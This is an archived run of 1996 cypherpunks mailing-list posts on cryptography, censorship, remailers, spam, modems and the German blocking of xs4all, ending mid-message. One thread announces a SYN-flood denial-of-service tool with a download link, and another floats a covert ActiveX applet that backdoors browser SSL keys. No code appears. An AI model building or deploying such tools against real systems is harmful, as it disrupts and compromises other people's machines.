I would not respect a person even a tiny bit more just because a kook disrespects them. In fact, since the kooks frequently hold each other in very low esteem, the suggested polarity-math is self-contradictory. Rather, I think this is an example of how direct exposure supercedes reputation. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA== =LdoS -----END PGP SIGNATURE----- From paul at fatmans.demon.co.uk Sat Sep 14 18:34:58 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 15 Sep 1996 09:34:58 +0800 Subject: forward secrecy in mixmaster Message-ID: <842701000.12934.0@fatmans.demon.co.uk> > This has been discussed extensively for Internet security reasons, and the > Photuris folks decided to use a common modulus (actually, several with different > lengths.) I think they chose a strong prime (form p = 2q+1, q prime), > specifically to avoid small-prime attacks, though they may have decided > that that was no longer necessary. I assume from the last sentence that you know that the use of strong primes is no longer advantageous but I will just reiterate it here for the good of those writing code which implements strong primes: Strong primes are no longer of any benefit for cryptographic applications. The elliptic curve method of factoring takes no longer to factor a "strong" prime than it does for any other general number. You may *SLIGHTLY* hinder progress if an attacker sieves first, but as you should have done so when you created the primes in the first place it won`t be a problem because there won`t be any small factors. Implementing strong primes won`t make your code any less secure, it will just take longer to create the keys and won`t gain you any security, all the big boys are using elliptic curve factoring methods now so you really have nothing to gain.
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From qut at netcom.com Sat Sep 14 19:04:03 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sun, 15 Sep 1996 10:04:03 +0800 Subject: ? In-Reply-To: Message-ID: <199609150021.RAA18148@netcom2.netcom.com> In <517ia2$dmn at Networking.Stanford.EDU> llurch at stanford.edu (Skippy) writes: ! Too long. A few hours ago, the blocking ended, so Ingrid's wacky analysis ! of how this is all a ZOG plot is moot. Your consistent defence of censorship noted. The mere fact that censorship is evadable, never justifies the evil. Would you make the claim that there are no drug laws merely because it's easy to evade the laws against possession? From stevenw at best.com Sat Sep 14 19:04:30 1996 From: stevenw at best.com (Steven Weller) Date: Sun, 15 Sep 1996 10:04:30 +0800 Subject: SPL -- Suspicious Persons List Message-ID: >Perry E.
Metzger wrote: >> >> Hallam-Baker writes: >> > Pity you guys missed out on the idea of trades unions and think that >> > employment is some kind of serfdom in which you lose all your >> > rights the day you sign up. If you hadn't sold your government to >> > the corporations a while back you might have got out of the middle >> > ages. >> >> Yes, we could be a workers paradise like one of those lovely European >> countries with double digit unemployment and all. Too bad we didn't go >> in for democratic socialism while we could have, eh? > >Perry, hate to burst your bubble but unemployment in the UK _tripled_ >in the first eighteen months of rule by that great socialist Margaret ^^^^^^^^^ >Thatcher. One third of UK manufacturing industry went bankrupt in the >only large scale application of Friedman's ideas. Ummm. We're being Hallam-Baker PhD'ed again. I think she was a little bit Tory. Conservative, maybe? Right wing? Funded by industry? On kissing terms with Reagan? Socialist, no. Or was this an attempt by Doctor Sarcasm at wit? Actually the UK is now way ahead of the rest of Europe in terms of deregulation, low labor costs, efficient manufacturing, etc. Germany and France are now up the familiar creek because of their too-socialist policies. But there are those who say that Thatcher's slash and burn approach was appalling. You get the government you deserve, but not necessarily when you deserve it. That's what causes all the fuss. ------------------------------------------------------------------------- Steven Weller | Technology (n): | | A substitute for adulthood. stevenw at best.com | Popular with middle-aged men. From jya at pipeline.com Sat Sep 14 19:46:52 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 10:46:52 +0800 Subject: FLO_odd Message-ID: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com> 2600, Summer, 1996 Flood Warning by Jason Fairlane This program scans a host to determine which ports are open, or listening for connections.
Once a list of receiving ports has been compiled, the program then floods each of them with the specified number of SYN packets. Don't use this software without permission. I'm serious. It's very very very bad. This is probably one of the worst forms of Denial-Of-Service attacks there is. No one will be able to connect to your target's machine. It's bad. [Code follows.] ----- http://jya.com/floodd.txt (12 kb) FLO_odd Thanks to XX. From dfloyd at io.com Sat Sep 14 20:28:47 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Sun, 15 Sep 1996 11:28:47 +0800 Subject: Erasing Disks In-Reply-To: <199609142059.NAA13108@netcom8.netcom.com> Message-ID: <199609150111.UAA00636@pentagon.io.com> > > >But shredding the floppy? No need to classify that, no secrets leaked > > Burn after shredding, or you have a puzzle fan reassembling the shredded disk. Actually, taking the cookie portion out, putting it on an inverted cup so it's in the center of the microwave, then letting it cook for 30 seconds does the job quite well =) From azur at netcom.com Sat Sep 14 20:48:37 1996 From: azur at netcom.com (Steve Schear) Date: Sun, 15 Sep 1996 11:48:37 +0800 Subject: Alien and Sedition Acts [WAS xs4all.nl] then Terrorists Message-ID: Look for something along these lines from Congress in the not too distant future. All in our best interest, of course. (from 'In Pursuit of Reason: The Life of Thomas Jefferson, Noble E. Cunningham, Jr.) "The first alien act (June 25, 1798) empowered the president to order the deportation of any alien he judged "dangerous to the peace and safety of the united States" or had reasonable grounds to suspect was involved in any treasonable intrigue against the government. It was up to the president to determine what constituted a danger." "Even more sweeping and more objectionable to Republican opponents of the administration was the sedition act (July 14, 1798).
Passed in the final days of the session, after Jefferson had left for Virginia, the act made it unlawful for any person to combine or conspire together to oppose any lawful measure of the government, to prevent any officer of the united States from performing his duties, or to aid or attempt to procure 'any insurrection, riot, unlawful assembly, or combination.' Furthermore, it provided for the punishment of any person writing, uttering, or publishing 'any false, scandalous and malicious writing' against the president, the Congress of the government of the united States, made with the intent to defame them or excite against them 'the hatred of the good people of the united States.'" >At Mon, 9 Sep 1996 17:54:29 -0700, Timothy C. May wrote: > >> Then again, the only reason I am not a terrorist is that the government >>hasn't YET defined hate speech directed against the government to be >>terrorism. > >Don't be so hasty in saying this. > >A couple of months ago Clinton signed some sort of bill having to do with >terrorism, terrorist organizations, funding of same, and deportation of >alien-units suspected of being allied with terrorist organizations. (I seem >to recall another such act being passed in early 1995, so there may be more >than one of these things...) > >Given the mounting hysteria about terrorism (by the government, at least), >and given the various laws on the books, I would not be surprised to see >some Web sites prosecuted as "harboring" terrorists terrorist-symps. > >If any of you are not citizens of the U.S., and are here on visas, I would >give this some real serious thought. Of course, maybe deportation is a >blessing in disguise. > >--Tim May From perry at piermont.com Sat Sep 14 21:03:45 1996 From: perry at piermont.com (Perry E.
Metzger) Date: Sun, 15 Sep 1996 12:03:45 +0800 Subject: FLO_odd In-Reply-To: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com> Message-ID: <199609150203.WAA06409@jekyll.piermont.com> The software in question should come with a warning attached: use it and go to jail. It's a felony to maliciously disrupt someone's machines. Perry John Young writes: > 2600, Summer, 1996 > > Flood Warning > > by Jason Fairlane > > > This program scans a host to determine which ports are open, > or listening for connections. Once a list of receiving ports > has been compiled, the program then floods each of them with > the specified number of SYN packets. > > Don't use this software without permission. I'm serious. It's > very very very bad. This is probably one of the worst forms > of Denial-Of-Service attacks there is. No one will be able > to connect to your target's machine. It's bad. > > [Code follows.] > > ----- > > http://jya.com/floodd.txt (12 kb) > > FLO_odd > > > Thanks to XX. > > > > From jya at pipeline.com Sat Sep 14 22:06:34 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 13:06:34 +0800 Subject: FLO_odd Message-ID: <199609150315.DAA13440@pipe2.t2.usa.pipeline.com> On Sep 14, 1996 22:03:28, '"Perry E. Metzger" ' wrote: >The software in question should come with a warning attached: use it and go to >jail. It's a felony to maliciously disrupt someone's machines. ---------- Heed Perry: here's the author's warning at the commencement of code: /* !!THIS PROGRAM IS EXTREMELY DANGEROUS!! NO GUIDELINES * ARE PROVIDED FOR THE CODE CONTAINED HEREIN. IT IS MERELY * A DEMONSTRATION OF THE POSSIBLE DESTRUCTIVE USE OF IP * SPOOFING TECHNIQUES. THE AUTHOR CLAIMS NO RESPONSIBILITY * FOR ITS USE OR MISUSE. - JF (3/8/96) */ From jamesd at echeque.com Sat Sep 14 22:21:05 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 15 Sep 1996 13:21:05 +0800 Subject: Why organizations turn statist.
Message-ID: <199609150312.UAA02749@dns2.noc.best.net> At 09:44 AM 9/11/96 -0700, Timothy C. May wrote: > A wonderful idea, Stephan! You might try contacting > EFF to see if a German branch exists The EFF is ultimately a business lobby group, because it gets most of its funding from businesses. It is therefore potentially subject to the same corruption as other business lobbies. Business lobby groups are intermediaries, and therefore serve two masters, both the politicians and the businessmen, not one master. Frequently they serve the interests of the politicians at the expense of their donors, at the expense of the goals that the lobby group is supposed to pursue. Suppose for example you have a lobby group that represents the widget industry. On the one hand, the CEO of General Widgets might ring them up and say: "We are being trashed by these great japanese widgets, and unless something is done about it we might have to reduce prices or improve quality", and the lobby organization has a little chat with some tame politicians about the terrible suffering the Japanese are inflicting on American workers. That is the way lobby groups are supposed to work, but seldom do. On the other hand sometimes the politician (or a gofer on his staff), rings the lobby and says: "I need a million dollars fast: What potential political action gets the chairman of General Widgets waking up in a cold sweat in the middle of the night? What could destroy the widget industry, and yet be politically feasible?" Shortly thereafter the lobbyist has a little chat with chairman of General Widgets about forthcoming legislation. The lobby group gets a big bag of money, some of which it passes on to the politician, and the threatened legislation evaporates until the next election. To be a successful lobby group, the EFF needs to get its fingerprints on legislation, so that it can make threats and promises to businessmen in the computer industry. 
Thus the EFF's best interests as an organization are contrary to our desires and contrary to the announced aims of the organization. Legislation, any legislation, is in their interests and legislation, any legislation is against our interests. Our interests, and the EFF's interest are opposed with no apparent mutual good possible. Now it is possible that the EFF is virtuously pursuing its supposed goals, rather than its practical interests. We should consider the available evidence in order to infer what it is in fact up to. According to Dave Barry the word "politics" derives from the Greek "poly" meaning many, and "ticks" meaning small disgusting bloodsucking parasites. In order to be well funded, the EFF needs government regulation of the net. The kind of regulation that would be most effective in ensuring large donations would be regulation that compels internet businessmen to lobby the government. for example regulations that make impossible, inconsistent, and contradictory requirements on those who provide software, hardware, and services, for example a demand that big companies police the net in ways that even governments would find extremely difficult, such as the British child porn crackdown, or legislation which if properly crafted would have the effect of giving some businessmen a monopoly of some aspect of the net, and putting other businessmen out of business, for example legislation that requires case by case approval of software, or legislation that compels the businessman to invade his customers privacy, and also prohibits him from invading that privacy unless he has a waiver issued by the state. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. 
| jamesd at echeque.com From jamesd at echeque.com Sat Sep 14 22:22:07 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 15 Sep 1996 13:22:07 +0800 Subject: Jury Nullification = Voting One's Conscience Message-ID: <199609150324.UAA03466@dns2.noc.best.net> At 07:24 PM 9/11/96 -0700, Timothy C. May wrote: > And I don't think there has _ever_ been a case of a juror prosecuted/jailed > for voting his or her conscience, regardless of jury instructions. Where have you been for the last twenty years? In fact a juror was recently jailed for this. She had informed the other juries of the likely severity of the punishment for pot, and refused to vote for conviction. She was charged with perjury and various contrived and bogus charges. The basis of perjury charge was that she had sworn there was no reason she could not do justice, and, according to the court, she was not doing justice because of her opposition to the drug laws.. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 22:37:33 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 13:37:33 +0800 Subject: Uses of Computational Chaos Message-ID: <01I9HJIYSVKK9ULPY6@mbcl.rutgers.edu> It is reasonably obvious that using _computational_ (as opposed to physical) chaos won't increase entropy. But how about using it to make an attacker work harder to use any flaws in your method of generating random bits? As a simplistic example, say that the scribble window you're using tends to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit. 
But if that output is then fed into a chaotic system as its starting conditions, and you then take the state of that system after a sufficient number of iterations and use it as the basis for the IDEA key or whatever, the attacker doesn't just have to search through all the IDEA keys with the third bits being 1's - they have to process each of those through the chaotic system and use those results. Sort of like factoring - checking any two given prime factors will be rather easy, it's just the sheer number you have to check that makes things difficult. (This can be thought of as an odd variety of hash, particularly if you do something like chopping off the most-significant-bit in the chaotic system's output.) -Allen From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 23:00:54 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 14:00:54 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <01I9HK94QG309ULPY6@mbcl.rutgers.edu> From: IN%"jf_avon at citenet.net" "Jean-Francois Avon" 14-SEP-1996 03:33:52.00 To: IN%"cypherpunks at toad.com" CC: Subj: RE: "Remailers can't afford to be choosy" >If, just for the sake of example, you were truly believing in >unregulated capitalism, with all the arguments in the world, and , >say for the sake of the example, again, a True Communist (tm) was >mailing through your remailer, advocating that they seize your >property for the benefit of some unknown, but all deserving stranger. >Would any censorship be illegitimate? In other words, should you >work to further the work of the ones who whishes, but their avowed >goals, to bring you harm? Actually, I already may have helped a radical left organization - namely Radikal - by putting some mirror sites on a lot of search engines. Quite simply, capitalism works - and it will win out in an unfettered contest. It's communism and other varieties of authoritarianism that need the fetters to win. 
(In the ultimate extreme, I include gun control under the fetters that communism/etcetera need to win... the "redistribution" from producers ("rich") to welfare drones ("poor") during the Rodney King riots would have been nicely prevented by some shopkeepers with automatic weapons. -Allen From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 23:06:39 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 14:06:39 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <01I9HKVBXEBM9ULPY6@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 13-SEP-1996 20:33:15.39 >I'm fully aware of the rights of remailers to limit what they pass on. I >just don't think it wise, nor do I think it fits with pious calls for "free >speech." I've been looking over your original posting... such as at your comment about situations working out the best when only the parties involved are involved in rulemaking. I'd agree... and remailer operators are among the parties involved in these cases. This may be via direct individual pressure (for remailers without front ends) or through conscience/social pressure (for remailers with disposable front ends or chaining-only remailers), but they're still involved. To me, there are two different types of filtering that can be done. There's the filtering of data into their appropriate categories - e.g., a moderator of a mailing list deciding that something is off-topic _for that list_, not for any discussion - and filtering of data into stuff that should be transmitted and shouldn't be transmitted, even though, e.g., it's on topic for a given mailing list. I discourage people from doing the second type of filtering - it's something that government shouldn't do at all, and that makes in my view the person doing such filtering responsible for _everything_ that they do let through (preferably legally responsible). 
The first type is tricky enough to tell from the second that I don't want government doing it, but I don't discourage others from doing so. There's also the matter that it will take some improvements to get to a situation where remailer operators won't have to deal with so much - e.g., expiration of some patents so that remailers can take digital cash. It's just that I don't see pressure such as from spamming through remailers as helping to get those improvements, all in all. Some of it may - e.g., encouragement of dropping of inadequately secure remailers like anon.penet.fi (sorry, Julf), as you mentioned - but this isn't the case for all of it. -Allen From mycroft at actrix.gen.nz Sun Sep 15 01:34:07 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Sun, 15 Sep 1996 16:34:07 +0800 Subject: Exactly the point Lance... [Fwd: HipCrime and Art] In-Reply-To: <199609141912.NAA13899@rintintin.Colorado.EDU> Message-ID: <199609150555.RAA03096@mycroft.actrix.gen.nz> On Sat, 14 Sep 1996 13:08:22 -0600, Admin wrote: Exactly the point, bingo! The point is this, exactly what do YOU define as *fucking shit* so that anyone who visits your page will know exactly what they can and can't say to Lance Cottrell. We've determined that you don't want to receive the HipCrime URL from your mailto: button. What about the next visitor who comes across your page, how will they know exactly what you do or do not find interesting? Will you put a lengthy *what I expect from all correspondents who use my mailto: button* explanation on the page? Perhaps a simple, *don't mail me unless I already know you and want to hear what you have to say...* tag? I think it's fairly obvious that any mailto tag on Lance's *Mixmaster page* is for comments and suggestions concerning Mixmaster, or the page itself. URLs about fractal art, who killed JFK, and your favourite episode of The X Files could then be expected to be considered *fucking shit*. 
As you seem to feel that being accessible by email is licence for anyone to send you anything they want unless they have specific knowledge that you don't want to receive it, and given that I have no knowledge about what you don't want to receive, I'm going to set up a spider to trawl the web and mail you every single URL it encounters, in the certain knowledge that you consider this legitimate use of your address :-) -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- I'm having an emotional outburst!! From stewarts at ix.netcom.com Sun Sep 15 09:07:34 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 00:07:34 +0800 Subject: 56 kbps modems Message-ID: <199609150831.BAA20470@dfw-ix6.ix.netcom.com> >> >U.S. Robotics and Rockwell International are planning new modems with >> >speeds up to 56 kbps a second, almost double the speed of the fastest >> >rate now available. The new devices should be available by the end of >> >the year, although their top speed initially may be less than 56 kbps. >> >(Wall Street Journal 12 Sep 96 B11) >> People who seemed to know used to say that 'the Shannon limit' >> set an absolute upper limit around 40 kbps. Has Shannon been >> proven wrong, or what? >Well, it all depends on the signal-to-noise ratio. Also, if the noise is >not white gaussian the situation can be even better. Or it can be worse. Almost all voice traffic in the US these days, either once it gets to your local telephone wire center or maybe before, is carried on T1 digital connections, which use 64kbps digital voice - it's sampled at 8000 samples/second, A/D converted using a non-linear 8-bit scale called mu-law (or A-law for Europe), and (for the most common framing format) has a signalling channel stego'd onto the LSB of every 6th byte. 
If you knew which the "robbed bit" was, you could get 63 kbps of digital data, but since you don't, digital signals are limited to 56kbps since they can't trust any of the low bits (analog doesn't lose much from this.) Unless they're _really_ talking about ISDN "modems", I'm surprised to hear somebody saying they can take 56 kbps, turn it into analog, let the phone company quantize and mu-law the analog into 64kbps, and still get the original 56kbps back out. But if they can, well, yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is still useful for some applications, the convenience of two channels on one wire pair is nice, and the fact that people can get 56kbps without the phone company's help will pressure them into offering ISDN for a lower price in areas where the Phone Company's idea of "all the market will bear" is substantially higher than voice pricing.) (For Norm Hardy's comment on PBXs, the main transparent approach to that is to use ISDN as the interface. PBXs often use ISDN to reach either local or long-distance phone companies, since they generally want more than vanilla signalling anyway.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sun Sep 15 09:08:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 00:08:15 +0800 Subject: HipCrime as MetaSPAM Message-ID: <199609150910.CAA20840@dfw-ix6.ix.netcom.com> The Hippie Of Crime suggests that anybody who puts a mailto: with their name on it is inviting mail, so what he did shouldn't be construed as rude. He also asked that remailer operators not block HipCrime SPAM deliveries and all mail to HipCrime because people might be interested in his cool fractals and Java neural net lotto-predicters and anarchist pages. I disagree, on various points. 
1) There's a Robot Exclusion Standard, which uses a robots.txt file as a convention for websites to inform webcrawling programs of sections of their directories they don't want crawled through. The HipCrime Email Robot appears to ignore this convention - I don't have a Java Decompiler on my Wimpy Win3.1 system, but the strings program doesn't show the string robots.txt anywhere in the bytecodes, which I assume means it ain't there. 2) If a mailto: on a web page is an offer to human readers to send mail to a human or bot that handles mail relevant to some topic on the page, that doesn't mean the author invited mail except as described in the human-readable-language on the page, which may say which addresses are invitations to send mail on what topic. Furthermore, the author may not be the recipient of the mail anyway; The Hippie Of Crime Lives Here 3) An invitation to a reader to send mail from the reader isn't an invitation to send a large number of identical mail messages. A spam-generator like the Hippie Of Crime posted isn't designed to add comments from the reader of the MetaSpamEmailRobot page, it's designed to get many other people to send HippieSPAMs from the Hippie Of Crime. 4) This isn't the first time he's done this sort of thing. I took a look at the www.hipcrime.com pages, and aside from the Annoying Frames and Highly Annoying Evil META REFRESH auto-flipping pages, and Annoying Animated GIFs, there were some really cool-looking fractals, and a saga about how a few years ago he was faxing fractals out to a few hundred people who he'd put on a fax-mailing list, many without asking them. ====================================================================== Free FAX Fractals Free-FAX-Fractals was a long running FAX prank/art project, using facsimile machines to invade office spaces with monochrome mathematical psychedelia. During 1992 and 1993, a list of over 500 fax numbers was compiled while roaming around San Francisco. 
These numbers were taken mostly from signs and business cards, but many people volunteered their numbers hoping to receive trippy fractal faxes on a weekly basis. ===========rest-of-saga omitted================================ Only a couple people actually complained, and the police _asked_ to get added to the list. 5) "Anarchist Info" - sigh. Where do people get the idea that publishing recipes for drugs and explosives is anarchist info? He didn't talk about anarchy, or getting along without governments, or getting rid of them. Also, he neglects to note that you can simply _buy_ potassium chlorate, rather than having to (dangerously) boil down bleach and potassium chloride to make the stuff. Don't try this crap at home, kids, and please don't blame the anarchists for it. Just a Hippie Of Crime, not a Hippie Of Clue. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From paul at fatmans.demon.co.uk Sun Sep 15 09:11:01 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 16 Sep 1996 00:11:01 +0800 Subject: Cypherpunks Message-ID: <842781740.23306.0@fatmans.demon.co.uk> > CypherPunks live so far from real-life, that it's impossible for them > to communicate rationally. Never having any danger in their lives, > they want to avoid encountering any in "cyberspace". They are trying > to craft that new world according to their intellectual guidelines. > Trying to make sure real-world annoyances have been removed. No, I can`t let that pass, to say that cypherpunks try to avoid danger in real life and online is absolute rubbish. 
The libertarian politics embodied by the cypherpunk movement encourages a way of life which is indeed more dangerous than other types of society, annoyances are different, sure they try to avoid annoyances, but this does not stretch as far as encouraging censorship, it's just that, from my point of view anyway, most cypherpunks' idea of a utopian society does not include big commerce, which is associated with big government, indeed most of us find the one minded lust for money of the junk mailers to be distasteful in itself. To say we attempt to create a "safe" society online and off is correct but only in a superficial sense, I believe the cypherpunks want a safe society as much as anyone else but believe that the best way to achieve it is through individual liberty, not through totalitarian statist government, furthermore cypherpunks and libertarians as a whole accept that a dangerous society is an inevitable consequence of a free society, but that this is a price worth paying. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" 
From pgut001 at cs.auckland.ac.nz Sun Sep 15 09:13:59 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Mon, 16 Sep 1996 00:13:59 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84279182110737@cs26.cs.auckland.ac.nz> >>[...] The reason for the 40-bit key and (according to RSADSI, the >>company that developed RC4) the reason why details on it were kept >>secret was that these conditions were required under an agreement >>between the Software Publishers Association (SPA) and the US >>government which gave special export status to the RC4 algorithm and >>a companion algorithm called RC2. > >Hadn't heard that before, that the trade secret requirement was imposed on >RSADSI. What was your source for that info, it is an interesting assertion on >the part of RSADSI, and I am intrigued. It's in AC II, p.319 (I was getting worried for a minute, I missed it the first time I looked and then couldn't figure out where I'd got the info from). >You ought to reference Andrew Roos paper [posted to the list, and sci.crypt, >at least] analysing key schedule biases in RC4. It's mentioned in the list of minor RC4 weaknesses. I didn't include refs for all of these because I've already probably got as many references in there as text (the term "reference terrorism" has been used to describe some of my papers in the past). >Strangely (I'm not sure if anyone lost money due to this), I think Netscape's >prices hardly suffered, perhaps even improved slightly. Could be due to the >`any publicity is good publicity' syndrome. There was a *lot* of publicity, >and Netscape's response in fixing the problem was good. Several US cypherpunks >were tracking the stocks at the time, and could probably verify this. Interesting... does anyone want to comment on this? 
This kind of damages one of my assumptions in the paper that publicity attacks can hurt a company providing poor security. Could it be that at the time people would buy Netscape stock no matter what happened? If MSIE had been widespread at the time, would it have caused people to jump ship en masse? >One omission: you didn't say anything about Paul Kocher's timing attack on >RSA, which I think affected Netscape servers, and was fixed after his >publicizing the attack. Then you could discuss Ron Rivest's blinding >solution, and the time delay solution. It's a pretty obscure attack and one which most implementations (ones running on home PC's) won't ever need to worry about, given that it's many times easier to get a victim to download some whiz-bang ActiveX applet which quietly patches their browser to use a fixed key for all SSL sessions. Has anyone thought of doing this? If I had a system (and compiler) capable of building ActiveX apps I'd love to do this - create an espionage-enabling screen saver or something. Peter. From liberty at gate.net Sun Sep 15 09:28:17 1996 From: liberty at gate.net (Jim Ray) Date: Mon, 16 Sep 1996 00:28:17 +0800 Subject: [Noise] Shopkeepers Preventing Riot Redistribution Message-ID: <199609151328.JAA16180@osceola.gate.net> Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: EALLENSMITH at ocelot.Rutgers.EDU, cypherpunks at toad.com Date: Sun Sep 15 09:26:45 1996 EALLENSMITH at ocelot.Rutgers.EDU wrote: ... >... the "redistribution" from > producers ("rich") to welfare drones ("poor") during the Rodney King > riots > would have been nicely prevented by some shopkeepers with automatic > weapons. Indeed, it was. 
In a beautiful-to-me scene which Miami's WSVN, Channel 7 (our big-hair station) called "chilling," Korean-American shopkeepers, perched atop their building with semi-automatic firearms, kept one block safe while the rest of the neighborhood burned without police protection. Upon being informed that this was a biased interpretation of legitimate actions by the merchants, which _I_ found heartwarming, they said that chilling was "just a word." JMR -- "'Media bias' is just 2 words." Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From tank at xs4all.nl Sun Sep 15 10:29:38 1996 From: tank at xs4all.nl (tank) Date: Mon, 16 Sep 1996 01:29:38 +0800 Subject: URGENT: Final draft GLOBAL ALERT: German Government censors dutch site www.xs4all.nl Message-ID: <199609151412.QAA19956@xs1.xs4all.nl> Stanton McCandlish suggested some important corrections. I changed the draft accordingly and extended the sign-on deadline with one day. Please sign on for your organisation to the following alert NOW, deadline: Tu. sept. 17th 24.00 hr. GMT. 
I added already some (default) signatures, let me know before the deadline when you want your signature deleted. After the deadline I'll make this alert public on Wednesday sept. 18th (again: provided I don't get serious objections!). Arie *** GLOBAL ALERT *** (not yet) FOR IMMEDIATE RELEASE SEPT. 18, 1996 - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 15 October 1996 Global Alert: German Government Pushes Blockage of Netherlands Web Sites At the behest of, and in response to legal threats from, the German government, internet providers in Germany have blocked the Dutch Web site Access For All (www.xs4all.nl), removing German users' access to the entire xs4all system. The German government demanded this action because xs4all hosts a Web "home page" with so called left-wing political content that, though fully legal in the Netherlands, is allegedly illegal in Germany. (see: http://www.anwalt.de/ictf/p960901e.htm). As a result of this action, *all* xs4all web sites, including several thousand that have nothing to do with the offending home page, are unavailable to readers in Germany. Please send a letter of protest to the German ambassador in your country, ask your foreign minister to protest officially to the German government, and distribute this alert as widely as possible online and to the press. Referring to article 19(2) of the International Covenant on Civil and Political rights, which Germany ratified in 1973, we, the undersigned organizations, consider this censorship an illegal act. Additionally, the value of attempting to ban content the German government finds offensive is highly questionable. The proper response to offensive expression is more and better expression, and prosecution of offending criminals, not censorship. 
As a result of the overly broad censorship measure which targets an entire Internet access provider instead of a specific user, all 3000 and more Web sites hosted by xs4all are virtually inaccessible in Germany. The loss of clients who market in Germany has resulted in economic damage to xs4all. The immeasurable harm of censoring thousands of other users for the speech of one is even greater. Access for All, though it has expressed willingness to assist the Dutch police in identifying online criminals abusing the xs4all system, has a policy against censoring its clients. Mirroring this position, at least one German Net provider has responded to the government demands with skepticism, pointing out that their compliance with the censorship request may cause them to violate contracts with their own German users, and that the government's liability threats are tantamount to holding a phone company liable for what users say on the telephone. Instead of the futile act of censorship that has simply drawn increased attention to the offending material and resulting in its widespread availability on other sites throughout the world, the German government should have acted through legal channels and asked that the authorities in the Netherlands take appropriate actions. We are concerned that German internet providers have cooperated so easily with government censorship efforts. Some level of cooperation was probably assured by underhanded and rather questionable police threats of system operator liability for user content, but we must urge more resistance on the part of Net access providers to such online censorship schemes. As with libraries, there are many who would censor, but there is a responsibility on the part of providers of access to information, to work to protect that access, else libraries, and Internet service providers, lose the reason for their existence. 
We demand that the German government refrain from further restrictive measures and intimidation of internet providers and recognize the free, democratic, world wide communications represented by the Internet. All governments must recognize that the Internet is not a local, or even national, medium, but a global medium in which regional laws have little useful effect. "Top-down" censorship efforts not only fail to prevent the distribution of material to users in the local jurisdiction (material attacked in this manner can simply be relocated to Italy or Antigua or any other country), but constitute a direct assault on the rights and other interests of Internet users and service providers in other jurisdictions, not subject to the censorship law in question. For press contacts, and for more information about the Internet, see homepages for the signatories to this message: DB-NL (Digital Citizens Foundation in the Netherlands) * http://www.xs4all.nl/~db.nl ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei CITADEL-E F France * http://www.imaginet.fr/~mose/citadel CommUnity (UK) * http://www.community.org.uk Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontier Foundation (USA) * http://www.eff.org Other signatures: Please send the signature of your organisation to me that I can add it to this alert. Arie Dirkzwager, Board member of DB-NL (Digital Citizens Foundation in the Netherlands). From tank at xs4all.nl Sun Sep 15 10:42:52 1996 From: tank at xs4all.nl (tank) Date: Mon, 16 Sep 1996 01:42:52 +0800 Subject: I could get arrested by German authorities (German censorship) (fwd) Message-ID: <199609151421.QAA20176@xs1.xs4all.nl> A letter from Felipe Rodriquez, chairman of 